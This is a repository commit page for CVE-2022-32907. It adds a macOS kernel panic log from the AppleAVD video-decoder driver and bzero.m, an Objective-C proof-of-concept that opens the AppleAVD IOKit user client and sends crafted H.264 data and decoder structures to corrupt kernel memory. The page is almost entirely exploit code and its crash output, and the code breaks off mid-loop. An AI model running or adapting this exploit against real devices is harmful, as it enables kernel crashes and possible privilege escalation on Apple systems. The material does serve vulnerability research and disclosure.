Projects STRLCPY CVE-2022-32907 Commits 861f3972
🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    2022-09-13-170848.kernel.core.log
     1 +panic(cpu 4 caller 0xfffffe00151d5084): Kernel data abort. at pc 0xfffffe001494cbc0, lr 0x27c97e00153efa50 (saved state: 0xfffffe3efed834f0)
     2 + x0: 0xfffffe8ff9f2a548 x1: 0x0000000000000000 x2: 0x0000000000000e78 x3: 0xfffffe8ff9f2a548
     3 + x4: 0x0000000000000000 x5: 0x0000000000000000 x6: 0x0000000000000000 x7: 0x0000000000000000
     4 + x8: 0x0000000000006548 x9: 0xfffffe8ff9f24000 x10: 0x0000000000000000 x11: 0x0000000000000e78
     5 + x12: 0x0000000100000000 x13: 0x0200000010000220 x14: 0x0200000110000258 x15: 0x0000000000000003
     6 + x16: 0x33fefe001494cba0 x17: 0xfffffe001794ad50 x18: 0x0000000000000000 x19: 0xfffffe2998a0c000
     7 + x20: 0xfffffe299a748034 x21: 0xfffffe2fff946830 x22: 0x00000000e00002bd x23: 0xfffffe8ff9f2a548
     8 + x24: 0xfffffe2998a0c000 x25: 0xfffffe2fff94682c x26: 0x000000002b680030 x27: 0x0000000000000000
     9 + x28: 0x0000000000000000 fp: 0xfffffe3efed83840 lr: 0x27c97e00153efa50 sp: 0xfffffe3efed83840
     10 + pc: 0xfffffe001494cbc0 cpsr: 0x20401208 esr: 0x96000047 far: 0xfffffe8ff9f2a548
     11 +
     12 +Debugger message: panic
     13 +Memory ID: 0x6
     14 +OS release type: User
     15 +OS version: 21G83
     16 +Kernel version: Darwin Kernel Version 21.6.0: Wed Aug 10 14:28:35 PDT 2022; root:xnu-8020.141.5~2/RELEASE_ARM64_T8101
     17 +Fileset Kernelcache UUID: 8717C09A06C825DAD6BD67DF56C53A04
     18 +Kernel UUID: BC97BA71-6E6A-35ED-9323-0D12CBE0FD9A
     19 +iBoot version: iBoot-7459.141.1
     20 +secure boot?: YES
     21 +Paniclog version: 13
     22 +KernelCache slide: 0x000000000d0b0000
     23 +KernelCache base: 0xfffffe00140b4000
     24 +Kernel slide: 0x000000000d860000
     25 +Kernel text base: 0xfffffe0014864000
     26 +Kernel text exec slide: 0x000000000d948000
     27 +Kernel text exec base: 0xfffffe001494c000
     28 +mach_absolute_time: 0xd0d62437
     29 +Epoch Time: sec usec
     30 + Boot : 0x63211ab2 0x0004e520
     31 + Sleep : 0x00000000 0x00000000
     32 + Wake : 0x00000000 0x00000000
     33 + Calendar: 0x63211b3e 0x000e6d06
     34 +
     35 +Zone info:
     36 + Zone map: 0xfffffe10000d0000 - 0xfffffe30000d0000
     37 + . VM : 0xfffffe10000d0000 - 0xfffffe14ccd9c000
     38 + . RO : 0xfffffe14ccd9c000 - 0xfffffe1666734000
     39 + . GEN0 : 0xfffffe1666734000 - 0xfffffe1b33400000
     40 + . GEN1 : 0xfffffe1b33400000 - 0xfffffe20000cc000
     41 + . GEN2 : 0xfffffe20000cc000 - 0xfffffe24ccd98000
     42 + . GEN3 : 0xfffffe24ccd98000 - 0xfffffe2999a64000
     43 + . DATA : 0xfffffe2999a64000 - 0xfffffe30000d0000
     44 + Metadata: 0xfffffe3ee9628000 - 0xfffffe3ef1628000
     45 + Bitmaps : 0xfffffe3ef1628000 - 0xfffffe3ef4220000
     46 +
     47 +CORE 0 recently retired instr at 0xfffffe0014ae4388
     48 +CORE 1 recently retired instr at 0xfffffe0014ae4388
     49 +CORE 2 recently retired instr at 0xfffffe0014ae4388
     50 +CORE 3 recently retired instr at 0xfffffe0014ae4388
     51 +CORE 4 recently retired instr at 0xfffffe0014ae2dac
     52 +CORE 5 recently retired instr at 0xfffffe0014ae438c
     53 +CORE 6 recently retired instr at 0xfffffe0014ae438c
     54 +CORE 7 recently retired instr at 0xfffffe0014ae438c
     55 +CORE 0 PVH locks held: None
     56 +CORE 1 PVH locks held: None
     57 +CORE 2 PVH locks held: None
     58 +CORE 3 PVH locks held: None
     59 +CORE 4 PVH locks held: None
     60 +CORE 5 PVH locks held: None
     61 +CORE 6 PVH locks held: None
     62 +CORE 7 PVH locks held: None
     63 +CORE 0: PC=0x00000001a31db60c, LR=0x00000001a31dba98, FP=0x000000016f575b80
     64 +CORE 1: PC=0x000000019c069ce8, LR=0x000000019c0847c4, FP=0x000000016d9a19e0
     65 +CORE 2: PC=0x0000000199b40e90, LR=0x0000000199b44844, FP=0x000000016d8055e0
     66 +CORE 3: PC=0x000000019c069ce8, LR=0x000000019c082d2c, FP=0x000000016d5d24c0
     67 +CORE 4 is the one that panicked. Check the full backtrace for details.
     68 +CORE 5: PC=0xfffffe0014ad11e4, LR=0xfffffe0014adf8b4, FP=0xfffffe4c799fbe90
     69 +CORE 6: PC=0xfffffe00149db0f4, LR=0xfffffe00149db0f4, FP=0xfffffe8fef723f00
     70 +CORE 7: PC=0xfffffe00149db0f4, LR=0xfffffe00149db0f4, FP=0xfffffe8feeeabf00
     71 +Compressor Info: 0% of compressed pages limit (OK) and 0% of segments limit (OK) with 0 swapfiles and OK swap space
     72 +Panicked task 0xfffffe2998f0c000: 391 pages, 3 threads: pid 606: bzero
     73 +Panicked thread: 0xfffffe24ce46d960, backtrace: 0xfffffe3efed82bb0, tid: 6436
     74 + lr: 0xfffffe00149a53a0 fp: 0xfffffe3efed82c20
     75 + lr: 0xfffffe00149a5068 fp: 0xfffffe3efed82c90
     76 + lr: 0xfffffe0014aea9a0 fp: 0xfffffe3efed82cb0
     77 + lr: 0xfffffe0014adcc0c fp: 0xfffffe3efed82d20
     78 + lr: 0xfffffe0014ada7f0 fp: 0xfffffe3efed82de0
     79 + lr: 0xfffffe00149537f8 fp: 0xfffffe3efed82df0
     80 + lr: 0xfffffe00149a4cf0 fp: 0xfffffe3efed83190
     81 + lr: 0xfffffe00149a4cf0 fp: 0xfffffe3efed83200
     82 + lr: 0xfffffe00151cc6bc fp: 0xfffffe3efed83220
     83 + lr: 0xfffffe00151d5084 fp: 0xfffffe3efed833a0
     84 + lr: 0xfffffe0014adca0c fp: 0xfffffe3efed83410
     85 + lr: 0xfffffe0014adaaf4 fp: 0xfffffe3efed834d0
     86 + lr: 0xfffffe00149537f8 fp: 0xfffffe3efed834e0
     87 + lr: 0xfffffe00153efa50 fp: 0xfffffe3efed83840
     88 + lr: 0xfffffe00153efa50 fp: 0xfffffe3efed83900
     89 + lr: 0xfffffe00153ed7dc fp: 0xfffffe3efed83940
     90 + lr: 0xfffffe001512c3d8 fp: 0xfffffe3efed83ad0
     91 + lr: 0xfffffe0014aaab3c fp: 0xfffffe3efed83bf0
     92 + lr: 0xfffffe00149ab804 fp: 0xfffffe3efed83c90
     93 + lr: 0xfffffe001497d288 fp: 0xfffffe3efed83cf0
     94 + lr: 0xfffffe0014998474 fp: 0xfffffe3efed83d80
     95 + lr: 0xfffffe0014acfc38 fp: 0xfffffe3efed83e50
     96 + lr: 0xfffffe0014adab80 fp: 0xfffffe3efed83f10
     97 + lr: 0xfffffe00149537f8 fp: 0xfffffe3efed83f20
     98 + Kernel Extensions in backtrace:
     99 + com.apple.driver.AppleAVD(566.0)[84E0B714-21BE-34C6-BBB6-131B8F44B14D]@0xfffffe001537fa40->0xfffffe001540bc8b
     100 + dependency: com.apple.driver.AppleARMPlatform(1.0.2)[D6AC4E5E-4C53-3002-9BE7-F346C9D0FA10]@0xfffffe00153308a0->0xfffffe001537af3b
     101 + dependency: com.apple.driver.FairPlayIOKit(68.16.0)[7169D92E-7162-30D6-BAE0-F65DA16FA4C0]@0xfffffe00164cf440->0xfffffe00165923af
     102 + dependency: com.apple.iokit.IOSurface(302.14)[B51F2E2D-D85F-38BD-9250-62A605B5B0F1]@0xfffffe0016df4540->0xfffffe0016e14bf7
     103 +
     104 +last started kext at 553389490: com.apple.driver.driverkit.serial 6.0.0 (addr 0xfffffe001473e1b0, size 3416)
     105 +loaded kexts:
     106 +com.apple.filesystems.autofs 3.0
     107 +com.apple.driver.AppleTopCaseHIDEventDriver 5450.8
     108 +com.apple.driver.AppleBiometricServices 1
     109 +com.apple.driver.CoreKDL 1
     110 +com.apple.driver.BCMWLANFirmware4378.Hashstore 1
     111 +com.apple.driver.SEPHibernation 1
     112 +com.apple.driver.DiskImages.ReadWriteDiskImage 493.0.0
     113 +com.apple.driver.DiskImages.UDIFDiskImage 493.0.0
     114 +com.apple.driver.DiskImages.RAMBackingStore 493.0.0
     115 +com.apple.driver.DiskImages.FileBackingStore 493.0.0
     116 +com.apple.driver.AppleUSBDeviceNCM 5.0.0
     117 +com.apple.driver.AppleSmartBatteryManager 161.0.0
     118 +com.apple.driver.AppleThunderboltIP 4.0.3
     119 +com.apple.driver.AppleFileSystemDriver 3.0.1
     120 +com.apple.driver.AppleALSColorSensor 1.0.0d1
     121 +com.apple.nke.l2tp 1.9
     122 +com.apple.filesystems.tmpfs 1
     123 +com.apple.driver.AppleAOPVoiceTrigger 140.1
     124 +com.apple.filesystems.lifs 1
     125 +com.apple.filesystems.apfs 1934.141.2
     126 +com.apple.IOTextEncryptionFamily 1.0.0
     127 +com.apple.filesystems.hfs.kext 583.100.10
     128 +com.apple.security.BootPolicy 1
     129 +com.apple.BootCache 40
     130 +com.apple.AppleFSCompression.AppleFSCompressionTypeZlib 1.0.0
     131 +com.apple.AppleFSCompression.AppleFSCompressionTypeDataless 1.0.0d1
     132 +com.apple.driver.AppleSmartIO2 1
     133 +com.apple.driver.ApplePMP 1
     134 +com.apple.driver.ApplePMPFirmware 1
     135 +com.apple.AppleEmbeddedSimpleSPINORFlasher 1
     136 +com.apple.driver.AppleCS42L83Audio 550.3
     137 +com.apple.driver.AppleDPDisplayTCON 1
     138 +com.apple.driver.AppleSPMIPMU 1.0.1
     139 +com.apple.driver.AppleTAS5770LAmp 550.3
     140 +com.apple.driver.AppleT8020SOCTuner 1
     141 +com.apple.driver.AppleT8103CLPCv3 1
     142 +com.apple.driver.AppleMobileDispH13G-DCP 140.0
     143 +com.apple.driver.AppleJPEGDriver 4.8.1
     144 +com.apple.driver.AppleAVE2 560.5.0
     145 +com.apple.driver.AppleAVD 566
     146 +com.apple.AGXG13G 190.22
     147 +com.apple.driver.usb.AppleSynopsysUSB40XHCI 1
     148 +com.apple.driver.AudioDMAController-T8103 160.2
     149 +com.apple.driver.AppleSerialShim 1
     150 +com.apple.driver.AppleEventLogHandler 1
     151 +com.apple.driver.AppleS5L8960XNCO 1
     152 +com.apple.driver.AppleT8103PMGR 1
     153 +com.apple.driver.AppleS8000AES 1
     154 +com.apple.driver.AppleS8000DWI 1.0.0d1
     155 +com.apple.driver.AppleInterruptController 1.0.0d1
     156 +com.apple.driver.AppleT8020DART 1
     157 +com.apple.driver.AppleBluetoothModule 1
     158 +com.apple.driver.AppleSamsungSerial 1.0.0d1
     159 +com.apple.driver.AppleBCMWLANBusInterfacePCIe 1
     160 +com.apple.driver.AppleS5L8920XPWM 1.0.0d1
     161 +com.apple.driver.AppleS5L8940XI2C 1.0.0d2
     162 +com.apple.driver.AppleSPIMC 1
     163 +com.apple.driver.AppleT8101 1
     164 +com.apple.driver.AppleM68Buttons 1.0.0d1
     165 +com.apple.iokit.IOUserEthernet 1.0.1
     166 +com.apple.driver.usb.AppleUSBUserHCI 1
     167 +com.apple.iokit.IOKitRegistryCompatibility 1
     168 +com.apple.iokit.EndpointSecurity 1
     169 +com.apple.driver.AppleDiskImages2 126.141.2
     170 +com.apple.AppleSystemPolicy 2.0.0
     171 +com.apple.nke.applicationfirewall 402
     172 +com.apple.kec.InvalidateHmac 1
     173 +com.apple.kec.AppleEncryptedArchive 1
     174 +com.apple.driver.driverkit.serial 6.0.0
     175 +com.apple.iokit.IOAVBFamily 1040.6
     176 +com.apple.plugin.IOgPTPPlugin 1040.3
     177 +com.apple.iokit.IOEthernetAVBController 1.1.0
     178 +com.apple.kext.triggers 1.0
     179 +com.apple.driver.AppleHIDKeyboard 228.2
     180 +com.apple.driver.AppleHSBluetoothDriver 5450.8
     181 +com.apple.driver.IOBluetoothHIDDriver 9.0.0
     182 +com.apple.driver.AppleActuatorDriver 5460.1
     183 +com.apple.driver.AppleMultitouchDriver 5460.1
     184 +com.apple.driver.AppleMesaSEPDriver 100.99
     185 +com.apple.iokit.IOBiometricFamily 1
     186 +com.apple.driver.AppleSEPHDCPManager 1.0.1
     187 +com.apple.driver.AppleTrustedAccessory 1
     188 +com.apple.iokit.AppleSEPGenericTransfer 1
     189 +com.apple.driver.DiskImages.KernelBacked 493.0.0
     190 +com.apple.driver.AppleXsanScheme 3
     191 +com.apple.driver.AppleBTM 1.0.1
     192 +com.apple.driver.AppleConvergedIPCOLYBTControl 1
     193 +com.apple.driver.AppleConvergedPCI 1
     194 +com.apple.driver.AppleBluetoothDebug 1
     195 +com.apple.driver.usb.networking 5.0.0
     196 +com.apple.driver.AppleThunderboltPCIDownAdapter 4.1.1
     197 +com.apple.driver.AppleThunderboltUSBDownAdapter 1.0.4
     198 +com.apple.driver.AppleThunderboltDPInAdapter 8.5.1
     199 +com.apple.driver.AppleThunderboltDPAdapterFamily 8.5.1
     200 +com.apple.nke.ppp 1.9
     201 +com.apple.driver.AppleHIDTransportSPI 5460.1
     202 +com.apple.driver.AppleHIDTransport 5460.1
     203 +com.apple.driver.AppleInputDeviceSupport 5460.1
     204 +com.apple.driver.AppleDCPDPTXProxy 1.0.0
     205 +com.apple.driver.DCPDPFamilyProxy 1
     206 +com.apple.driver.AppleBSDKextStarter 3
     207 +com.apple.driver.AppleAOPAudio 150.2
     208 +com.apple.filesystems.hfs.encodings.kext 1
     209 +com.apple.iokit.IONVMeFamily 2.1.0
     210 +com.apple.driver.AppleSPU 1
     211 +com.apple.driver.AppleDiagnosticDataAccessReadOnly 1.0.0
     212 +com.apple.driver.AppleNANDConfigAccess 1.0.0
     213 +com.apple.driver.AppleCSEmbeddedAudio 550.3
     214 +com.apple.AGXFirmwareKextG13GRTBuddy 190.22
     215 +com.apple.AGXFirmwareKextRTBuddy64 190.22
     216 +com.apple.driver.AppleDialogPMU 1.0.1
     217 +com.apple.driver.AppleHPM 3.4.4
     218 +com.apple.driver.AppleEmbeddedAudio 550.3
     219 +com.apple.iokit.AppleARMIISAudio 140.2
     220 +com.apple.driver.AppleStockholmControl 1.0.0
     221 +com.apple.driver.ApplePassthroughPPM 3.0
     222 +com.apple.driver.DCPAVFamilyProxy 1
     223 +com.apple.iokit.IOMobileGraphicsFamily-DCP 343.0.0
     224 +com.apple.iokit.IOMobileGraphicsFamily 343.0.0
     225 +com.apple.driver.AppleDCP 1
     226 +com.apple.driver.AppleFirmwareKit 1
     227 +com.apple.driver.AppleH11ANEInterface 5.68.0
     228 +com.apple.driver.AppleH13CameraInterface 6.51.1
     229 +com.apple.driver.AppleH10PearlCameraInterface 17.0.6
     230 +com.apple.iokit.IOGPUFamily 35.29
     231 +com.apple.driver.AppleT8103TypeCPhy 1
     232 +com.apple.driver.AppleUSBXDCIARM 1.0
     233 +com.apple.driver.AppleUSBXDCI 1.0
     234 +com.apple.iokit.IOUSBDeviceFamily 2.0.0
     235 +com.apple.driver.usb.AppleSynopsysUSBXHCI 1
     236 +com.apple.driver.usb.AppleUSBXHCI 1.2
     237 +com.apple.driver.AppleEmbeddedUSBHost 1
     238 +com.apple.driver.usb.AppleUSBHub 1.2
     239 +com.apple.driver.usb.AppleUSBHostCompositeDevice 1.2
     240 +com.apple.driver.AppleSPMI 1.0.1
     241 +com.apple.driver.AppleSART 1
     242 +com.apple.driver.ApplePMGR 1
     243 +com.apple.driver.AppleARMWatchdogTimer 1
     244 +com.apple.driver.usb.AppleUSBHostPacketFilter 1.0
     245 +com.apple.driver.AppleDisplayCrossbar 1.0.0
     246 +com.apple.iokit.IODisplayPortFamily 1.0.0
     247 +com.apple.driver.AppleTypeCPhy 1
     248 +com.apple.driver.AppleThunderboltNHI 7.2.81
     249 +com.apple.driver.AppleT8103PCIeC 1
     250 +com.apple.iokit.IOThunderboltFamily 9.3.3
     251 +com.apple.driver.ApplePIODMA 1
     252 +com.apple.driver.AppleT8103PCIe 1
     253 +com.apple.driver.AppleMultiFunctionManager 1
     254 +com.apple.driver.AppleBluetoothDebugService 1
     255 +com.apple.driver.AppleBCMWLANCore 1.0.0
     256 +com.apple.iokit.IO80211Family 1200.12.2b2
     257 +com.apple.driver.IOImageLoader 1.0.0
     258 +com.apple.driver.AppleOLYHAL 1
     259 +com.apple.driver.corecapture 1.0.4
     260 +com.apple.driver.AppleEmbeddedPCIE 1
     261 +com.apple.driver.AppleMCA2-T8103 640.5
     262 +com.apple.driver.AppleEmbeddedAudioLibs 140.1
     263 +com.apple.driver.AppleFirmwareUpdateKext 1
     264 +com.apple.driver.AppleGPIOICController 1.0.2
     265 +com.apple.driver.AppleFireStormErrorHandler 1
     266 +com.apple.driver.AppleMobileApNonce 1
     267 +com.apple.iokit.IOTimeSyncFamily 1040.3
     268 +com.apple.driver.DiskImages 493.0.0
     269 +com.apple.iokit.IOGraphicsFamily 597
     270 +com.apple.iokit.IOBluetoothSerialManager 9.0.0
     271 +com.apple.iokit.IOBluetoothHostControllerUSBTransport 9.0.0
     272 +com.apple.iokit.IOBluetoothHostControllerUARTTransport 9.0.0
     273 +com.apple.iokit.IOBluetoothHostControllerTransport 9.0.0
     274 +com.apple.driver.IOBluetoothHostControllerPCIeTransport 9.0.0
     275 +com.apple.iokit.IOBluetoothFamily 9.0.0
     276 +com.apple.driver.FairPlayIOKit 68.16.0
     277 +com.apple.iokit.CSRBluetoothHostControllerUSBTransport 9.0.0
     278 +com.apple.iokit.BroadcomBluetoothHostControllerUSBTransport 9.0.0
     279 +com.apple.driver.AppleSSE 1.0
     280 +com.apple.driver.AppleSEPKeyStore 2
     281 +com.apple.driver.AppleUSBTDM 533.120.2
     282 +com.apple.iokit.IOUSBMassStorageDriver 210.120.3
     283 +com.apple.iokit.IOPCIFamily 2.9
     284 +com.apple.iokit.IOSCSIBlockCommandsDevice 456.140.3
     285 +com.apple.iokit.IOSCSIArchitectureModelFamily 456.140.3
     286 +com.apple.driver.AppleIPAppender 1.0
     287 +com.apple.driver.AppleFDEKeyStore 28.30
     288 +com.apple.driver.AppleEffaceableStorage 1.0
     289 +com.apple.driver.AppleCredentialManager 1.0
     290 +com.apple.driver.KernelRelayHost 1
     291 +com.apple.iokit.IOUSBHostFamily 1.2
     292 +com.apple.driver.AppleUSBHostMergeProperties 1.2
     293 +com.apple.driver.usb.AppleUSBCommon 1.0
     294 +com.apple.driver.AppleSMC 3.1.9
     295 +com.apple.driver.RTBuddy 1.0.0
     296 +com.apple.driver.AppleEmbeddedTempSensor 1.0.0
     297 +com.apple.driver.AppleARMPMU 1.0
     298 +com.apple.iokit.IOAccessoryManager 1.0.0
     299 +com.apple.driver.AppleOnboardSerial 1.0
     300 +com.apple.iokit.IOSkywalkFamily 1.0
     301 +com.apple.driver.mDNSOffloadUserClient 1.0.1b8
     302 +com.apple.iokit.IONetworkingFamily 3.4
     303 +com.apple.iokit.IOSerialFamily 11
     304 +com.apple.driver.AppleSEPManager 1.0.1
     305 +com.apple.driver.AppleA7IOP 1.0.2
     306 +com.apple.driver.IOSlaveProcessor 1
     307 +com.apple.driver.AppleBiometricSensor 2
     308 +com.apple.iokit.IOHIDFamily 2.0.0
     309 +com.apple.iokit.CoreAnalyticsFamily 1
     310 +com.apple.AUC 1.0
     311 +com.apple.iokit.IOAVFamily 1.0.0
     312 +com.apple.iokit.IOHDCPFamily 1.0.0
     313 +com.apple.iokit.IOCECFamily 1
     314 +com.apple.iokit.IOAudio2Family 1.0
     315 +com.apple.driver.AppleIISController 140.1
     316 +com.apple.driver.AppleAudioClockLibs 140.1
     317 +com.apple.driver.AppleM2ScalerCSCDriver 265.0.0
     318 +com.apple.iokit.IOSurface 302.14
     319 +com.apple.driver.IODARTFamily 1
     320 +com.apple.security.quarantine 4
     321 +com.apple.security.sandbox 300.0
     322 +com.apple.kext.AppleMatch 1.0.0d1
     323 +com.apple.driver.AppleMobileFileIntegrity 1.0.5
     324 +com.apple.security.AppleImage4 4.2.0
     325 +com.apple.kext.CoreTrust 1
     326 +com.apple.iokit.IOCryptoAcceleratorFamily 1.0.1
     327 +com.apple.driver.AppleARMPlatform 1.0.2
     328 +com.apple.iokit.IOStorageFamily 2.1
     329 +com.apple.iokit.IOSlowAdaptiveClockingFamily 1.0.0
     330 +com.apple.iokit.IOReportFamily 47
     331 +com.apple.kec.pthread 1
     332 +com.apple.kec.Libm 1
     333 +com.apple.kec.corecrypto 12.0
     334 +
     335 +
     336 +** Stackshot Succeeded ** Bytes Traced 240993 (Uncompressed 606784) **
     337 +Writing local cores...
     338 +
     339 +Beginning coredump of kernel
     340 +10..
     341 +26..
     342 +36..
     343 +46..
     344 +56..
     345 +66..
     346 +76..
     347 +86..
     348 +96..
     349 +100..Done
     350 +Coredump complete of kernel, dumped 14552 segments (884359168 bytes), 8 threads (2304 bytes) overall uncompressed file length 885424168 bytes. Compressed file length is 228939809 bytes
     351 +
     352 +Beginning coredump of DCPEXT-coproc
     353 +Errors: Skipped DCPEXT coredump because ...
     354 + ... IOP was not running.
     355 + ... coredump segment information was not received.
     356 +coredump_init returned KERN_NODE_DOWN, skipping this core
     357 +
     358 +Beginning coredump of DCP-coproc
     359 +22..
     360 +33..
     361 +92..
     362 +100..Done
     363 +Coredump complete of DCP-coproc, dumped 23 segments (28409888 bytes), 1 threads (288 bytes) overall uncompressed file length 28426532 bytes. Compressed file length is 4588243 bytes
     364 +
     365 +Beginning coredump of ACIO1-coproc
     366 +Errors: Skipped ACIO1 coredump because ...
     367 + ... crashlog endpoint was not found.
     368 + ... IOP was not running.
     369 + ... coredump segment information was not received.
     370 +coredump_init returned KERN_NODE_DOWN, skipping this core
     371 +
     372 +Beginning coredump of ACIO0-coproc
     373 +Errors: Skipped ACIO0 coredump because ...
     374 + ... crashlog endpoint was not found.
     375 + ... IOP was not running.
     376 + ... coredump segment information was not received.
     377 +coredump_init returned KERN_NODE_DOWN, skipping this core
     378 + 
  • ■ ■ ■ ■ ■ ■
    bzero.m
     1 +#include <stdio.h>
     2 +#include <stdlib.h>
     3 +#include <string.h>
     4 +#include <unistd.h>
     5 +
     6 +#include <IOKit/IOKitLib.h>
     7 +#include <IOSurface/IOSurface.h>
     8 +
     9 +#include <Foundation/Foundation.h>
     10 +
     11 +#include <libkern/OSAtomic.h>
     12 +
     13 +#include <mach/thread_act.h>
     14 +
     15 +#include <pthread.h>
     16 +
     17 +#include <mach/mach.h>
     18 +#include <mach/vm_map.h>
     19 +#include <sys/mman.h>
     20 +
     21 +void pthread_func(void** msg);
     22 +unsigned int selector = 0;
     23 +
     24 +uint64_t inputScalar[16];
     25 +size_t inputScalarCnt = 0;
     26 +
     27 +uint8_t inputStruct[40960];
     28 +size_t inputStructCnt = 16;
     29 +
     30 +uint64_t outputScalar[16] = {0};
     31 +uint32_t outputScalarCnt = 0;
     32 +
     33 +char outputStruct[40960] = {0};
     34 +size_t outputStructCnt = 4;
     35 +
     36 +void null_sub(){}
     37 +
     38 +struct async_reference {
     39 + mach_port_t port;
     40 + void(*fptr)(void);
     41 + void* something;
     42 + };
     43 +
     44 +int main(int argc, char** argv){
     45 +
     46 + IOSurfaceRef r = IOSurfaceCreate(@{@"IOSurfaceAllocSize" : @(128)});
     47 +
     48 + int b = IOSurfaceGetAllocSize(r);
     49 +
     50 + printf("%x\n", b);
     51 +
     52 +
     53 +
     54 + kern_return_t err;
     55 +
     56 +
     57 + int** ptr= inputStruct;
     58 + ptr[0] = 0x77777777;
     59 + ptr[1] = rand();
     60 + ptr[2] = rand();
     61 + ptr[3] = rand();
     62 +
     63 +
     64 + CFMutableDictionaryRef matching = IOServiceMatching("AppleAVD");
     65 + if(!matching){
     66 + printf("unable to create service matching dictionary\n");
     67 + return 0;
     68 + }
     69 +
     70 + io_iterator_t iterator;
     71 + err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
     72 + if (err != KERN_SUCCESS){
     73 + printf("no matches\n");
     74 + return 0;
     75 + }
     76 +
     77 + io_service_t service = IOIteratorNext(iterator);
     78 +
     79 + if (service == IO_OBJECT_NULL){
     80 + printf("unable to find service\n");
     81 + return 0;
     82 + }
     83 +
     84 +
     85 +
     86 + printf("got service: %x\n", service);
     87 +
     88 + io_connect_t conn = MACH_PORT_NULL;
     89 +
     90 + int stype = 0x100 | 1 | 16;
     91 +
     92 + err = IOServiceOpen(service, mach_task_self(), stype, &conn);
     93 + if (err != KERN_SUCCESS){
     94 + printf("unable to get user client connection\n");
     95 + return 0;
     96 + }
     97 +
     98 + printf("got userclient connection: %x\n", conn);
     99 + IONotificationPortRef npr = IONotificationPortCreate(kIOMasterPortDefault);
     100 + mach_port_t np = IONotificationPortGetMachPort(npr);
     101 +
     102 + struct async_reference ar = {0};
     103 + ar.port = npr;
     104 + ar.fptr = null_sub;
     105 +
     106 +
     107 + char* addr = IOSurfaceGetBaseAddress(r);
     108 +
     109 + char nalu[] = { 0, 0, 0, 7, 0x68, 0xe8, 0x43, 0x82, 0xd2, 0xc8, 0xb0, 0, 0, 0, 32, 0x67, 0x64, 0x0, 0x33, 0xac, 0x72, 0x84, 0x40, 0x78, 0x2, 0x27, 0xe5, 0xc0, 0x44, 0x0, 0x0, 0x3, 0x0, 0x4, 0x0, 0x0, 0x3, 0x0, 0xf0, 0x3c, 0x60, 0xc6, 0x11, 0x80, 0x1, 0x0, 0x7};
     110 +
     111 +
     112 +
     113 + for(int i = 0; i < sizeof(nalu); i++){
     114 + addr[i] = nalu[i];
     115 + }
     116 +
     117 +
     118 + IOConnectCallAsyncMethod( //setCallback
     119 + conn,
     120 + 8,
     121 + np,
     122 + 0,
     123 + 0,
     124 + inputScalar,
     125 + inputScalarCnt,
     126 + inputStruct,
     127 + inputStructCnt,
     128 + outputScalar,
     129 + &outputScalarCnt,
     130 + outputStruct,
     131 + &outputStructCnt);
     132 +
     133 +
     134 + char inp[] = {0x80, 0x07, 0x00, 0x00, 0xa0, 0x05, 0x00, 0x00, 0x4e, 0x00, 0x00, 0x04, 0x04, 0x00, 0x00, 0x00,
     135 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
     136 + 0xff, 0x01, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
     137 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
     138 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
     139 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
     140 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
     141 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
     142 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
     143 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
     144 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
     145 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
     146 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x32, 0x00, 0x00, 0x00,
     147 + 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
     148 +
     149 +
     150 + inp[0xb8] = IOSurfaceGetID(r);
     151 +
     152 + size_t out_num = 0x60;
     153 +
     154 + IOConnectCallMethod( // createDecoder
     155 + conn,
     156 + 0,
     157 + inputScalar,
     158 + inputScalarCnt,
     159 + inp,
     160 + 0xd8,
     161 + outputScalar,
     162 + &outputScalarCnt,
     163 + outputStruct,
     164 + &out_num);
     165 +
     166 +
     167 + IOSurfaceRef r1 = IOSurfaceCreate(@{@"IOSurfaceAllocSize" : @(50000), @"IOSurfacePixelFormat" : @(0x61766331), @"IOSurfaceCacheMode" : @(1024) });
     168 +
     169 + IOSurfaceSetValue(r1, @"IOSurfaceName", @"AVD video decoder RVRA");
     170 +
     171 + char id = IOSurfaceGetID(r1);
     172 +
     173 + int ids[16];
     174 +
     175 + ids[0] = 128;
     176 + ids[1] = 0;
     177 + ids[2] = id;
     178 +
     179 +
     180 + void* ptrs[3];
     181 +
     182 + ptrs[0] = conn;
     183 + ptrs[1] = id;
     184 + ptrs[2] = np;
     185 +
     186 +
     187 + IOConnectCallMethod( // mapPixelBuffer
     188 + conn,
     189 + 3,
     190 + inputScalar,
     191 + inputScalarCnt,
     192 + ids,
     193 + 16,
     194 + outputScalar,
     195 + &outputScalarCnt,
     196 + outputStruct,
     197 + &outputStructCnt);
     198 +
     199 +
     200 +
     201 + char* fb = malloc(0x880);
     202 + while(true){
     203 +
     204 +
     205 +
     206 +
     207 + FILE* pFile;
